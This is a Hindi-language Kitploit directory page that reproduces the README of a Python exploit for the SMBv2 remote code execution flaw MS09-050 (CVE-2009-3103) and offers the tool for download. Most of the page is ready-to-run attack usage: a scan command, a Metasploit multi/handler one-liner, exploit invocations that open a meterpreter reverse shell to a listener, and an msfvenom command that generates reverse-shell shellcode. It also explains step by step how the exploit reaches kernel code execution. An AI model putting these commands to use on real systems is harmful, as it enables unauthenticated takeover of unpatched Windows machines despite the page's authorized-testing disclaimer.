Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
MS09-050 — MS09-050 (CVE-2009-3103) SMBv2 srv2.sys बफ़र ओवरफ़्लो के लिए Python exploit, जिसमें vulnerability scanner, arch auto-detection, और x86/x64 reverse shell payloads शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/bytejmp/ms09-050
भेद्यता स्कैनरपेलोड जनरेशनशोषणशेलकोडजानकारी एकत्र करनापोस्ट-शोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubbytejmp/ms09-050

MS09-050

14घं 42मि पहलेअभी तक समीक्षित नहीं

MS09-050 (CVE-2009-3103) SMBv2 srv2.sys बफ़र ओवरफ़्लो के लिए Python exploit, जिसमें vulnerability scanner, arch auto-detection, और x86/x64 reverse shell payloads शामिल हैं।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

MS09-050 — SMBv2 रिमोट कोड एक्ज़ीक्यूशन एक्सप्लॉइट

CVE-2009-3103

भेद्यता

Windows Vista और Server 2008 ने एक नए कर्नेल ड्राइवर, srv2.sys के साथ SMBv2 पेश किया। यह ड्राइवर SMB negotiate अनुरोधों में Process Id High फ़ील्ड को मान्य नहीं करता है। इस फ़ील्ड में विशेष रूप से तैयार किया गया मान भेजकर, एक हमलावर srv2.sys को एक नियंत्रित मान के साथ फ़ंक्शन पॉइंटर टेबल में इंडेक्स करने का कारण बनता है, जिससे हमलावर द्वारा प्रदान किए गए पते को डीरेफ़रेंस किया जाता है।

परिणाम कर्नेल संदर्भ में मनमाना कोड एक्ज़ीक्यूशन है, किसी प्रमाणीकरण की आवश्यकता नहीं। हमलावर को केवल पोर्ट 445 तक पहुंचने की आवश्यकता है।

Microsoft ने इसे अक्टूबर 2009 (KB975517) में पैच किया। कोई भी अनपैच्ड Vista SP1/SP2 या Server 2008 SP1 सिस्टम भेद्य है।

प्रभावित सिस्टम

लक्ष्य OSआर्किटेक्चर
Windows Vista SP1x86
Windows Vista SP2x86 / x64
Windows Server 2008 SP1x86 / x64
Windows Server 2008 SP1 (pre-R2)x64

विशेषताएँ

  • स्कैनर मॉड्यूल: SMB नेगोशिएशन के माध्यम से लक्ष्य OS और आर्किटेक्चर की फ़िंगरप्रिंटिंग करता है, भेद्यता स्थिति की रिपोर्ट करता है
  • ऑटो-डिटेक्ट आर्किटेक्चर: स्कैनर आर्क जानकारी को सीधे एक्सप्लॉइट में फ़ीड करता है, कोई मैन्युअल अनुमान नहीं
  • बिल्ट-इन पेलोड: x86 के लिए meterpreter/reverse_tcp स्टेजर, multi/handler के साथ उपयोग के लिए तैयार
  • msfvenom एकीकरण: msfvenom के माध्यम से किसी भी आर्क के लिए कोई भी पेलोड जनरेट करें, कस्टम पेलोड चुनने के लिए वैकल्पिक --msf-payload के साथ
  • कस्टम शेलकोड समर्थन: कोई भी रॉ शेलकोड फ़ाइल लोड करें (-s)
  • संरचित आउटपुट: [+] सफलता, [-] त्रुटि, [!] चेतावनी, [*] जानकारी

इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/bytejmp/MS09-050.git
cd MS09-050

आवश्यकताएँ:

  • Python 3.6+
  • rpcclient (smbclient पैकेज से), इंजेक्शन के बाद पेलोड को ट्रिगर करने के लिए उपयोग किया जाता है
  • msfvenom, केवल तभी आवश्यक जब --msfvenom फ़्लैग का उपयोग किया जा रहा हो

Debian/Ubuntu पर:

root@kitploit:~
sudo apt install smbclient

Arch Linux पर:

root@kitploit:~
sudo pacman -S smbclient

उपयोग

लक्ष्य को स्कैन करें

root@kitploit:~
python3 MS09.py scan -t 192.168.1.10

आउटपुट:

root@kitploit:~
[*] Scanning 192.168.1.10:445...
[+] Target 192.168.1.10 is reachable
[+] SMBv2 supported
[*] OS: Windows Vista (TM) Ultimate 6001 Service Pack 1
[*] Architecture: x86
[+] Target appears VULNERABLE to MS09-050

बिल्ट-इन पेलोड के साथ एक्सप्लॉइट (x86)

meterpreter/reverse_tcp स्टेजर का उपयोग करता है। पहले अपना हैंडलर शुरू करें:

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 10.0.0.5; set LPORT 4444; run"

फिर एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 MS09.py exploit -t 192.168.1.10 --payload -l 10.0.0.5 -p 4444

msfvenom के साथ एक्सप्लॉइट (कोई भी आर्क/पेलोड)

root@kitploit:~
python3 MS09.py exploit -t 192.168.1.10 --msfvenom -l 10.0.0.5 -p 4444 -a x64

msfvenom के साथ एक्सप्लॉइट (कस्टम पेलोड)

root@kitploit:~
python3 MS09.py exploit -t 192.168.1.10 --msfvenom --msf-payload windows/meterpreter/reverse_tcp -l 10.0.0.5 -p 4444

कस्टम शेलकोड फ़ाइल के साथ एक्सप्लॉइट

रॉ शेलकोड एक बार जनरेट करें, msfvenom के बिना पुनः उपयोग करें:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 EXITFUNC=thread -f raw -o shell.bin

फिर इसे एक्सप्लॉइट को दें:

root@kitploit:~
python3 MS09.py exploit -t 192.168.1.10 -s shellcode.bin -a x86

पूर्ण सहायता

root@kitploit:~
$ python3 MS09.py -h

usage: MS09.py [-h] {scan,exploit} ...

MS09-050 SMBv2 Remote Code Execution Exploit (CVE-2009-3103)

positional arguments:
  {scan,exploit}  Operation mode
    scan          Scan target for MS09-050 vulnerability
    exploit       Send exploit to target

$ python3 MS09.py exploit -h

usage: MS09.py exploit [-h] -t TARGET [-P PORT] [-a {x86,x64}]
                        (--payload | --msfvenom | -s FILE)
                        [-l LHOST] [-p LPORT] [--msf-payload PAYLOAD]

options:
  -t, --target      Target IP address
  -P, --port        SMB port (default: 445)
  -a, --arch        Target architecture (auto-detected if omitted)
  --payload         Use built-in reverse shell payload (no Metasploit needed)
  --msfvenom        Generate shellcode with msfvenom
  --msf-payload     msfvenom payload (default: shell_reverse_tcp x86, x64/shell_reverse_tcp x64)
  -s, --shellcode   Path to raw shellcode file
  -l, --lhost       Listener IP address
  -p, --lport       Listener port

प्रोजेक्ट संरचना

root@kitploit:~
MS09/
├── MS09.py              # Main entry point
├── README.md
└── lib/
    ├── __init__.py
    ├── output.py        # Standardized output formatting
    ├── scanner.py       # SMBv2 vulnerability scanner
    ├── payloads.py      # Built-in shellcode (reverse TCP shell)
    └── exploit.py       # Exploit buffer construction and delivery

यह कैसे काम करता है

  1. स्कैनर लक्ष्य OS संस्करण और आर्किटेक्चर की फ़िंगरप्रिंटिंग के लिए एक SMB1 Negotiate Protocol Request भेजता है
  2. एक्सप्लॉइट एक विकृत SMBv2 negotiate अनुरोध तैयार करता है जो srv2.sys में एक बफ़र को ओवरफ़्लो करता है
  3. कर्नेल संदर्भ में प्रारंभिक कोड एक्ज़ीक्यूशन प्राप्त करने के लिए एक sysenter hook stager का उपयोग किया जाता है
  4. स्टेजर यूज़र-मोड में ट्रांज़िशन करता है और प्रदान किए गए शेलकोड (रिवर्स शेल) को निष्पादित करता है
  5. rpcclient एक SMB प्रमाणीकरण प्रयास शुरू करके इंजेक्ट किए गए कोड को ट्रिगर करता है

संदर्भ

  • CVE-2009-3103
  • Microsoft Security Bulletin MS09-050
  • SRV2.SYS SMBv2 Vulnerability Analysis

अस्वीकरण

यह टूल केवल अधिकृत पेनेट्रेशन टेस्टिंग और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।

कंप्यूटर सिस्टम तक अनधिकृत पहुँच अधिकांश क्षेत्राधिकारों में एक आपराधिक अपराध है। किसी भी लक्ष्य के विरुद्ध इस टूल का उपयोग करने से पहले आपको सिस्टम स्वामी से स्पष्ट लिखित अनुमति प्राप्त करनी होगी। लेखक कोई दायित्व नहीं मानते हैं और इस सॉफ़्टवेयर के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं।

इस टूल का उपयोग करके, आप सहमत हैं कि:

  • आपके पास लक्ष्य सिस्टम का परीक्षण करने के लिए लिखित प्राधिकरण है
  • आप एक वैध सुरक्षा मूल्यांकन के दायरे में काम कर रहे हैं
  • आप अपने कार्यों की पूरी ज़िम्मेदारी स्वीकार करते हैं
  • आप सभी लागू कानूनों और विनियमों का पालन करेंगे

ज़िम्मेदारी से उपयोग करें। नैतिक रूप से हैक करें।

टूल डाउनलोड करें